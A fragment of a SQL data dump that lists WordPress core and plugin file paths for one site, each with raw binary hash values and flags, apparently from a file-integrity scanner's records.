('`,�,<�3Z�9g�','wp-content/plugins/elementor-pro/core/compatibility/compatibility.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/compatibility/compatibility.php',0,'0<*�}\r&�����?k','0<*�}\r&�����?k','%��T��t�d�w�\Z��v��<`X\r���f','',0,'?'),
('`1�{3|�EbjC�L$','wp-content/plugins/wordpress-seo/src/editors/framework/seo/terms/abstract-term-seo-data-provider.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/editors/framework/seo/terms/abstract-term-seo-data-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#+\r�8\n����_�h�','�V�i�\r%\"$�b������|\"P���f','',0,'?'),
('`1�;\'w���l���','wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Interfaces/Requirement.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Interfaces/Requirement.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%ImP�B���9�','�Q�#{e����{V��*A��q�EǍQ��]�','',0,'?'),
('`1��7�\\�*��g��','wp-content/plugins/elementor/modules/system-info/templates/raw.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/system-info/templates/raw.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7TX1�����WV���','���5�U��ܺ�%�2�7c�$8w\\��','',0,'?'),
('`?�����C��f�\r�','wp-content/plugins/elementor/assets/shapes/triangle-negative.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/shapes/triangle-negative.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���G`xH�C��\08`E','�=�Yk3��0�3�������U��}���i��','',0,'?'),
('`A�M�\r�D��S��','wp-content/plugins/elementor/modules/home/transformations/create-new-page-url.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/create-new-page-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���⬗��J*','S�+\'ۿ^�\Z��o���_�\r���0�3�3�','',0,'?'),
('`Bd3� C�j�3��n','wp-includes/blocks/verse/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/verse/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v��<_55ڬQ785','+�.�����D[�7� U�=�aI��-H\0w','',0,'?'),
('`J�q���)���','wp-content/plugins/elementor-pro/assets/js/form.efd3434e4ecbe4dd5fc6.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/form.efd3434e4ecbe4dd5fc6.bundle.js',0,',xM\"nU@{�닌D�9�',',xM\"nU@{�닌D�9�','�hK]���X�џ��Τݿ�%oWn��2�','',0,'?'),
('`N)fίe=�p�-�] �','wp-content/plugins/elementor/assets/js/image-carousel.4455c6362492d9067512.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/image-carousel.4455c6362492d9067512.bundle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�ܧY|��O!��','�`e�&n��HU�Q(��œ{�vk����lե�','',0,'?'),
('`h�u���[Ǯ����','wp-content/plugins/elementor/assets/js/editor-modules.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/editor-modules.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',g��~�c0�qw�','<�Mպb{$v�K��=��]rq�!�\n\"�ƼI','',0,'?'),
('`��kV�|E>x��5�','wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js',0,'�|��I1Qs�]-�0�u','�|��I1Qs�]-�0�u','�H��3imD��4���l#^8(>�B�Kw�','',0,'?'),
('`��N2E�ᆴ��pC�','wp-admin/images/privacy.svg','/var/www/html/ictbank/blog/wp-admin/images/privacy.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��o��%ф�C�u�','�!é�o�T���u5�HF���#&�H��h�V�~','',0,'?'),
('`��\n���2����','wp-admin/css/code-editor-rtl.css','/var/www/html/ictbank/blog/wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V��DBQVgF','w��86=�ݔ����2�\rD%V��E5�S� �T�','',0,'?'),
('`�ڃ�j���e�&��','wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kp��|k4��C�|=/','����F8���M7T�{߄q�j�IPS���','',0,'?'),
('`�\"٣���3�]|��','wp-content/plugins/elementor-pro/modules/woocommerce/tags/product-sku.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/tags/product-sku.php',0,'��6�s���!��0|','��6�s���!��0|','�oM����S��\r���=P��R�F���j�','',0,'?'),
('`��\'?��� �ݒ$�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/FulfilledPromise.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/FulfilledPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yj�p�� z�~��','�ކQ�\"���b����I�슫�3\ZB\r�WV�','',0,'?'),
('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js','/var/www/html/ictbank/blog/wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_���Xh�G�@�5�i','�h�����r��m\'6��FF��:[�j,���','',0,'?'),
('`�bG�Y���!�DZӉ\"','wp-content/plugins/elementor/core/common/modules/finder/categories-manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/common/modules/finder/categories-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t%�D��D�۴�','ʏ�5��E���5���c���H��ۅ4�d �','',0,'?'),
('`���Y�u�7�2��','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-factory/src/StreamFactoryInterface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-factory/src/StreamFactoryInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dh�f%E�n|1�N���',']�\\s�U�S1�U�{MQ��^W3�D�','',0,'?'),
('`��!},�N��#4�ip','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushVb.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushVb.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mQ^\0Z�(�\"`��','��e�)�$䝇>�#�����I\\�G���0x','',0,'?'),
('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QD2jF��D*.e��q','5r]��$1䘦�\0jfF�D\0t%�g��q','',0,'?'),
('`��цH.�g)I��8','wp-content/plugins/elementor/data/v2/base/processor/after.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/data/v2/base/processor/after.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��nq~\Z��F2x','4����SO�R�\'ֻ�D�~(�궉��$:�','',0,'?'),
('`�o�o�����Z�W8�`','wp-includes/js/dist/preferences.js','/var/www/html/ictbank/blog/wp-includes/js/dist/preferences.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϵ��=\rqz���E��%�','��I�\r�!9�;k2o:��♦�hK�zn�','',0,'?'),
('`�n��1�d��(�yt','wp-content/plugins/wordpress-seo/src/integrations/alerts/jetpack-boost-pre-publish.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/alerts/jetpack-boost-pre-publish.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nGL��d�p�O�','5r܌�Z��6�8�^�Un봵�o=A�<��K]','',0,'?'),
('`��w�1*Q� `��1C','wp-content/plugins/elementor-pro/core/integrations/actions/email/email.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/integrations/actions/email/email.php',0,'�ÒX���� ����','�ÒX���� ����','삆��d�;�z\r�2Д�4`��f2�:eu�vi','',0,'?'),
('`�l=��%|&�����','wp-content/plugins/elementor/modules/nested-elements/base/widget-nested-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/nested-elements/base/widget-nested-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�(���=��(o�','�8�ڂ�«��6��y��u�����l�5d{','',0,'?'),
('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),
('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),
('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php','/var/www/html/ictbank/blog/wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F 2\n�\Z�j9oI�\"��','���m�N�H3��ό�BN�|�+�wI������','',0,'?'),
('a�)6����ю�','wp-includes/js/plupload/moxie.js','/var/www/html/ictbank/blog/wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),
('a(�\0�\'~��u����W','wp-content/plugins/wordpress-seo/images/index.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','�� 蚠{�c�FJ�w��!}a���9�','',0,'?'),
('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png','/var/www/html/ictbank/blog/wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY ����V�Z��Gen�_','',0,'?'),
('a3����Y�����','wp-content/plugins/elementor-pro/modules/forms/fields/date.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/fields/date.php',0,'�U7�yъ3���y��','�U7�yъ3���y��','��W9���aLp>.N[�\r�-��~b$2���_','',0,'?'),
('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif','/var/www/html/ictbank/blog/wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9� M�\n��5�E��','��x��\"0��$���!��H��]������','',0,'?'),
('a^��O�Z@&��\";','wp-includes/css/dist/block-library/elements-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-library/elements-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�Y�p���U��','��������)m.~���yw`�@y�c�ZB','',0,'?'),
('ab*��~g��y���y�','wp-includes/block-supports/position.php','/var/www/html/ictbank/blog/wp-includes/block-supports/position.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�|�⪭�w$J�D','ufU�C���q�$�q��x+0�l!���26fX','',0,'?'),
('agOIK�1އ.\n�gB�','wp-includes/blocks/navigation/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/navigation/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�3�����4�E�','��4��\Z�r�^��\nj̠��ع�~`�','',0,'?'),
('a�w�U��\ZTz�K�','wp-includes/blocks/post-excerpt/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-excerpt/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e̅��bJ�&^ŧ','�������2u�� �l�x�D�g�/�v��','',0,'?'),
('a���|��u>� b�','wp-content/plugins/elementor/app/modules/import-export/runners/revert/plugins.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/import-export/runners/revert/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yA_�<5t�˚����o','�($���*ڍ]�����\']��Vl �aD\r���','',0,'?'),
('a�;�^�?!�ҡ�Y��','wp-content/plugins/wordpress-seo/css/dist/tooltips-2320-rtl.css','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/css/dist/tooltips-2320-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�W>�vJ*����','fu��s7p8�?��U QPJB�7��o��-��','',0,'?'),
('a�=����shSta��!','wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w���M�V[�$�R2�','i�B�)�6�a�ȝ@�g�w�\'�','',0,'?'),
('a�?��_�ˢ��6j��X','readme.html','/var/www/html/ictbank/blog/readme.html',0,'�T���1�KF�>','�T���1�KF�>','�^�^��U]c9����A�=\'�UM?��}ʸ�','',0,'?'),
('a�%|�^/`j�s�}','wp-content/plugins/elementor/assets/js/5975ee58d21883e10a11.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/5975ee58d21883e10a11.bundle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wy�c\r�-\"���=��','�����myNI�*�L���+$�v��k[3$���','',0,'?'),
('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r� ��&��!','',0,'?'),
('a����(m�EB�l�','wp-includes/media-template.php','/var/www/html/ictbank/blog/wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��t\r5���Ay���','�?@�)�zf ���,��T�!�����ە�l�','',0,'?'),
('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php','/var/www/html/ictbank/blog/wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���}{���+�V�z',':�=bM5O*M\r7�#�~�e^��b��\"��6','',0,'?'),
('a���o��lՓ\Z\nO�[�','wp-includes/class-wp-plugin-dependencies.php','/var/www/html/ictbank/blog/wp-includes/class-wp-plugin-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM1z�$w7�蚾�',' $��1\0��]*������ �{\Z콿�h�5iT','',0,'?'),
('a��;�v��Ш��','wp-content/plugins/elementor-pro/assets/js/notes/93.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/notes/93.min.js',0,'b{�D��[iFfQ@�','b{�D��[iFfQ@�','PQ��H��Έ�m�ܹ;4y��҅�P�eJ','',0,'?'),
('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php','/var/www/html/ictbank/blog/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|kl\\<��#�@6fb','oED vC:��F��ɀ2z���\Z��e�\Z�','',0,'?'),
('a�\n/�>۹�6�aԮ','wp-content/plugins/wordpress-seo/src/actions/importing/importing-indexation-action-interface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/actions/importing/importing-indexation-action-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��0�\0\Z�㋯M]C','���j-��#*�ʺ_���\r�D�3WwT��','',0,'?'),
('a�XʤG\'ɀn\r|t�N','wp-content/plugins/wordpress-seo/src/wrappers/wp-query-wrapper.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/wrappers/wp-query-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������&ҙm?�D�','vڣg�`��fv�0n;\\��U\'��','',0,'?'),
('bu��@�e,�\"w�ۏ','wp-content/plugins/elementor-pro/assets/css/frontend.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/frontend.css',0,'�+V�_y�*�%��X+','�+V�_y�*�%��X+','ƒ0��%i.���o�]�b����M��cY','',0,'?'),
('bc�W@ɉ�+_���','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Container.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��U�E>A��n','%��7�Y(-��F�SMY�E�?���,��Ҩ�','',0,'?'),
('b �!z�@\n�&+-矶','wp-content/plugins/elementor/assets/lib/font-awesome/css/svg-with-js.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/css/svg-with-js.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�v\"l��H��\n�','�����eݴEN&f�ԡ�>Bo6�H���\ZJ%D8','',0,'?'),
('b/���|a\"#�^\'��4�','wp-content/plugins/wordpress-seo/packages/js/images/jetpack-logo.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/packages/js/images/jetpack-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ah�N��N>W���\n�w','`��h�-ݯ��rb20і�;<r�f/i��\\|{','',0,'?'),
('bB�Zߚ�8c��.�n','wp-content/uploads/2021/06/mysql.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/06/mysql.jpg',0,'�nw��X�� Է','�nw��X�� Է','K��h�ޙ��R�D�+q��3��i:f�~UMr�','',0,'?'),
('bC������>\n%����','wp-content/plugins/elementor/assets/lib/swiper/swiper.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/swiper/swiper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OM}�ťX��p\\ĵZ�','�R׀^U��~�z\'��}�甛����L#\'�','',0,'?'),
('bE��>H0�l��v��','wp-content/plugins/elementor-pro/modules/search/data/controller.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/search/data/controller.php',0,'�x.[�rp��p�W�','�x.[�rp��p�W�','��%b��#-%����[��?��=S*^�[','',0,'?'),
('bUND>�k���Gȸ��W','wp-content/plugins/wordpress-seo/inc/class-post-type.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/class-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�]$@�u3�H','F���S{O8j�S�ɂj�9?c1:=����x~','',0,'?'),
('bV��X˾���$L��}q','wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Configuration.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Configuration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g}��0�_����t3\\','�^T��\'�O {q�5�2����k.^+h��','',0,'?'),
('bY�,��ϥY�r�;�','wp-includes/js/crop/cropper.css','/var/www/html/ictbank/blog/wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),
('bZ�cZw�e�Ý�����','wp-content/plugins/elementor-pro/assets/js/media-carousel.d8417210e0b731dd32b8.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/media-carousel.d8417210e0b731dd32b8.bundle.js',0,'MNf��15��E�j=4','MNf��15��E�j=4','\0�@A��_vW�n���m|٬;�~��ĸ����T�','',0,'?'),
('bj��|�^�3�','wp-content/uploads/2022/02/linux-1536x864.png','/var/www/html/ictbank/blog/wp-content/uploads/2022/02/linux-1536x864.png',0,'5��-�EbJ��p���.]','5��-�EbJ��p���.]','^9\" ��)�NJ�u�5<9�\"�qj�0���','',0,'?'),
('blED��;ֽ�V���','wp-content/plugins/elementor-pro/modules/floating-buttons/widgets/contact-buttons-var-4.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/floating-buttons/widgets/contact-buttons-var-4.php',0,'�ۺS�,���]�','�ۺS�,���]�','gg�튅x���_ʛ�f(T��A\"��,zQ','',0,'?'),
('bol��w�\\եޟ\"%Z','wp-content/uploads/elementor/css/post-647.css','/var/www/html/ictbank/blog/wp-content/uploads/elementor/css/post-647.css',0,'��+\0�_�!�6EٯP�F','��+\0�_�!�6EٯP�F','��&�y{^a���˦e���-� �Ž3���','',0,'?'),
('bq��kQ!���','wp-content/plugins/elementor-pro/modules/theme-builder/classes/templates-types-manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/classes/templates-types-manager.php',0,'4Ϟ� �m6�|[M���','4Ϟ� �m6�|[M���','��ۜ;!�qyvڅ�Q>?Qzɚ\Z�r-HzC\Z�','',0,'?'),
('b����_iE�=�f]','wp-content/plugins/wordpress-seo/packages/js/images/wp-recipe-maker-logo.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/packages/js/images/wp-recipe-maker-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EVV��#�J�@�','p���>�H���̩���5��g����(@��9�$','',0,'?'),
('b�E�#�vX�9Ư,','wp-content/plugins/wordpress-seo/images/error-icon.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/error-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+9�U;1p�Ŀkt�[','�Zrg���6���J��v`�<�cěb���&','',0,'?'),
('b��S]�hRgϐ���P','wp-content/plugins/elementor/assets/mask-shapes/hexagon.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/mask-shapes/hexagon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.f$�b6���O6<f�','�^�5�[�2[���E,�ˀY���>�BO۔�I\0�','',0,'?'),
('b�&�i���鹋�(I�','wp-content/plugins/wordpress-seo/src/promotions/domain/black-friday-promotion.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/promotions/domain/black-friday-promotion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\"b�����v��\n','��y��<<�A驣\'yiΏ�>;�;','',0,'?'),
('b���:L��H:A#�G\rf','wp-content/uploads/2021/12/banner01.png','/var/www/html/ictbank/blog/wp-content/uploads/2021/12/banner01.png',0,'rc��i�\n-���','rc��i�\n-���','rz���Bx�f\0Gv���=k��7�O�,','',0,'?'),
('b�l6�%~�*\nb��','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushArduino.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushArduino.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dk)]����vyiY�f','�@��{���z�L�7��eI�.��#%���(��','',0,'?'),
('b��=�nN��*(~7w�^','wp-content/plugins/wordpress-seo/images/academy/local.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/academy/local.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�&�{�����p<�;','g3���3�:��T��^��$.Q\Z0��1�','',0,'?'),
('b��φ�N�ь����','wp-content/plugins/elementor/core/editor/loader/editor-loader-factory.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/editor/loader/editor-loader-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��]a�i/���z\\','}uD{I�=�)L�`%�oR�̖��O�Vԡ�:','',0,'?'),
('bƘ�9�?KC��D2��','wp-content/plugins/wordpress-seo/images/seo_analysis.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/seo_analysis.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��&Q�ڞx/\r�l�^�','5ʑB�Jf�������A>�m���디','',0,'?'),
('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�]I�������','�kew̄E?�����ӰĴ�&�Ƌ�#�L�','',0,'?'),
('b�P�n�^��k!�E$','wp-includes/js/dist/undo-manager.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/undo-manager.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W8�6�K\'��M�\"','�:!��kW{�����iV����B}0.�Wtm�\\','',0,'?'),
('b�\r#9��a�$�wn��','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-squirrly.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-squirrly.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��|a*�e��3�_','WCA�@�?�u2,�S�*(mR���]|5���','',0,'?'),
('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js','/var/www/html/ictbank/blog/wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�,yV��~=���','��r�\'�b\Z�v�����i�|�~�4K�]�^�5','',0,'?'),
('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php','/var/www/html/ictbank/blog/wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y���1�����]Fh','VӒk\0��7��\'��b�����aK�X�����-','',0,'?'),
('b�I��P����G!��H','wp-content/plugins/wordpress-seo/js/dist/languages/ru.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/languages/ru.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Vҍ^_�o�r���','�+�^�㠀Z0��\'��@����IL��ճ�','',0,'?'),
('b����&f0�WM�/;�','wp-content/plugins/elementor/assets/css/widget-icon-box.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�.�ټ������C[�','�.�\\<#�تd�\"��(�\0,�+�U1�4\0�=f','',0,'?'),
('bK�+x����wF','wp-admin/css/site-health.css','/var/www/html/ictbank/blog/wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�@���ܾ�6l��','dK��\"����hs�P��?�G�%\0�A� Ǎ','',0,'?'),
('c餟��(Ok1�!͂','wp-admin/privacy.php','/var/www/html/ictbank/blog/wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�6��[�$@lڜ�S','�RiS2�&x\Z8T\nGta�Mt��r��y �','',0,'?'),
('c(y�F�z��!r���','wp-content/plugins/elementor-pro/modules/share-buttons/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/share-buttons/module.php',0,'ʫ�%�gg»��:.','ʫ�%�gg»��:.','���ؤ�wFC�]�A�A�$�M��b�~�_','',0,'?'),
('c2�}�H���b`M]�','wp-content/plugins/elementor/assets/lib/imagesloaded/imagesloaded.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/imagesloaded/imagesloaded.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0��v6��0HL�','b�\Z�/;$+���]�⸫X��ZN�����f�','',0,'?'),
('c�.�K-��k3��d�','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T����i�l��Ǖ','�_�IU�Ɋ+�s/,�R�9����u�ޡ�','',0,'?'),
('c2\r\"�� J��','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushYaml.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushYaml.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f���\n�kz��_p�','�[<���e�\n�IB�*���^�^M�ۍ��','',0,'?'),
('c���#5?�l�C�Th','wp-content/plugins/wordpress-seo/src/values/robots/user-agent.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/values/robots/user-agent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�n\0���T#�_X�>','�`%�[hCX��6�ȍ��͖�GO�~o3�J�','',0,'?'),
('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php','/var/www/html/ictbank/blog/wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��aSYyl)�K�6','F_۰�G\ZO0�c��~��I�h��\nY;jƣ��','',0,'?'),
